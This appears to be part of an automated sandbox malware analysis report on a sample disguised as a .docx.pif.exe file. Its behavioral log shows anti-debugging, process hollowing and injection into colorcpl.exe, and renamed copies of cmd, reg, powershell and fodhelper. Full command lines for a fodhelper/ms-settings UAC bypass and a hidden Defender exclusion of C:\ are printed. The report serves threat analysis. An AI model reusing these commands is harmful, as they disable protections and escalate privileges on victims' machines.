              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,14_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,14_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,14_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,14_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF64B5635B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589665
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589253
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0459C291
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0458C34D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0458BD37
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045CE879 FindFirstFileExA,31_2_045CE879
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_0458880C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458783C FindFirstFileW,FindNextFileW,31_2_0458783C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_04599AF5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0458BB30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_04587C97
              Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\AppData\Jump to behavior
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000864000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeAPI call chain: ExitProcess graph end nodegraph_0-32947
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299D920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0299D920
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess queried: DebugFlagsJump to behavior
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5863FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,8_2_00007FF64B5863FC
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,24_2_00007FF7E0A0A29C
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02997CC8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029DF3AD mov eax, dword ptr fs:[00000030h]0_2_029DF3AD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045C32B5 mov eax, dword ptr fs:[00000030h]31_2_045C32B5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]31_2_06421082
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]31_2_06421082
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06463F64 mov eax, dword ptr fs:[00000030h]31_2_06463F64
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56CD90 GetProcessHeap,RtlAllocateHeap,8_2_00007FF64B56CD90
              Source: C:\Users\Public\xkn.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,3_2_004098D0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004098F0 SetUnhandledExceptionFilter,3_2_004098F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004099EC SetUnhandledExceptionFilter,3_2_004099EC
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,3_1_004098D0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004098F0 SetUnhandledExceptionFilter,3_1_004098F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004099EC SetUnhandledExceptionFilter,3_1_004099EC
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF64B578FA4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5793B0 SetUnhandledExceptionFilter,8_2_00007FF64B5793B0
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF64B578FA4
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5793B0 SetUnhandledExceptionFilter,10_2_00007FF64B5793B0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF64B578FA4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5793B0 SetUnhandledExceptionFilter,12_2_00007FF64B5793B0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF64B578FA4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5793B0 SetUnhandledExceptionFilter,14_2_00007FF64B5793B0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF64B578FA4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5793B0 SetUnhandledExceptionFilter,17_2_00007FF64B5793B0
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FF7E0A0ED50
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0F050 SetUnhandledExceptionFilter,24_2_00007FF7E0A0F050
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_045B4FDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_045B49F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B4B47 SetUnhandledExceptionFilter,31_2_045B4B47
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_045BBB22
              Source: C:\Users\Public\xkn.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMemory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMemory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 18160000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6421617Jump to behavior
              Drops or copies cmd.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 value starts with: 4D5AJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection unmapped: C:\Users\Public\Libraries\drbdmeyP.pif base address: 400000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMemory written: C:\Users\Public\Libraries\drbdmeyP.pif base: 3F8008Jump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe31_2_045920F7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04599627 mouse_event,31_2_04599627
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pifJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exeProcess created: unknown unknown
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; " Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; " Jump to behavior
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ3\
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managern.
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager404
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager404:0
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager404n.
              Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, logs.dat.31.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B4C52 cpuid 31_2_045B4C52
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_0299DAA4
